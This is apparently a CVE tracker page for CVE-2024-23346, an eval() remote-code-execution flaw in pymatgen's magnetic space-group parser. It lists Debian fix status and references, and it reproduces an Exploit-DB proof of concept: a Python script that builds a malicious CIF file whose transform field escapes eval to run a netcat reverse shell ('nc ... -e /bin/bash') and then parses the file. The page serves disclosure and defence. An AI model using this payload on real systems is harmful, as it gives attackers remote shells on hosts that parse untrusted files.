CVE-2024-23346
Description
Pymatgen (Python Materials Genomics) is an open-source Python library for materials analysis. A critical security vulnerability exists in the `JonesFaithfulTransformation.from_transformation_str()` method within the `pymatgen` library prior to version 2024.2.20. This method insecurely utilizes `eval()` for processing input, enabling execution of arbitrary code when parsing untrusted input. Version 2024.2.20 fixes this issue.
Predictions
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ if you've already worked around this in production โ publish your fix to the community-verified tier.
โ Propose a mitigation on Community โ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
Pymatgen 2024.1 - Remote Code Execution (RCE)
# Exploit Title : Pymatgen 2024.1 - Remote Code Execution (RCE)
# Google Dork : (not applicable)
# Date : 2024-11-13
# Exploit Author : Mohammed Idrees Banyamer
# Vendor Homepage : https ://pymatgen.org
# Software Link : https ://pypi.org /project /pymatgen/
# Version : 2024.1
# Tested on : Kali Linux 2024.1
# CVE : CVE-2024-23346
import os
# Function to create the malicious CIF file
def create_malicious_cif(ip, port):
# Constructing the malicious CIF file with reverse shell payload
malicious_cif = f"""
data_5yOhtAoR
_audit_creation_date 2024-11-13
_audit_creation_method "CVE-2024-23346 Pymatgen CIF Parser Reverse Shell Exploit"
loop_
_parent_propagation_vector.id
_parent_propagation_vector.kxkykz
k1 [0 0 0]
_space_group_magn.transform_BNS_Pp_abc 'a,b,[d for d in ().__class__.__mro__[1].__getattribute__ ( *[().__class__.__mro__[1]]+["__sub" + "classes__"]) () if d.__name__ == "BuiltinImporter"][0].load_module ("os").system ("nc {ip} {port} -e /bin/bash");0,0,0'
_space_group_magn.number_BNS 62.448
_space_group_magn.name_BNS "P n' m a' "
"""
# Save to a file
with open("vuln.cif", "w") as file:
file.write(malicious_cif)
print("[*] Malicious CIF file created: vuln.cif")
# Function to trigger the exploit by parsing the malicious CIF file
def exploit():
ip = input("Enter your IP address for the reverse shell: ")
port = input("Enter the port for the reverse shell to listen on: ")
# Create the malicious CIF file
create_malicious_cif(ip, port)
# Trigger the Pymatgen CIF parser to parse the malicious file
from pymatgen.io.cif import CifParser
parser = CifParser("vuln.cif")
structure = parser.parse_structures()
# Running the exploit
if __name__ == "__main__":
exploit()OS impact
Debian Fixed 3 releases
| Version | Status | Fixed in |
|---|---|---|
| trixie | Fixed | 2024.1.27+dfsg1-6 |
| sid | Fixed | 2024.1.27+dfsg1-6 |
| bookworm | Fixed | 2022.11.7+dfsg1-11+deb12u1 |
References
- https://github.com/materialsproject/pymatgen/security/advisories/GHSA-vgv8-5cpj-qj2f
- https://nvd.nist.gov/vuln/detail/CVE-2024-23346
- https://github.com/materialsproject/pymatgen/commit/c231cbd3d5147ee920a37b6ee9dd236b376bcf5a
- https://github.com/materialsproject/pymatgen
- https://github.com/materialsproject/pymatgen/blob/master/pymatgen/symmetry/settings.py#L97C1-L111C108
- https://github.com/pypa/advisory-database/tree/main/vulns/pymatgen/PYSEC-2024-226.yaml
- https://www.vicarius.io/vsociety/posts/critical-security-flaw-in-pymatgen-library-cve-2024-23346
- https://security-tracker.debian.org/tracker/CVE-2024-23346
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.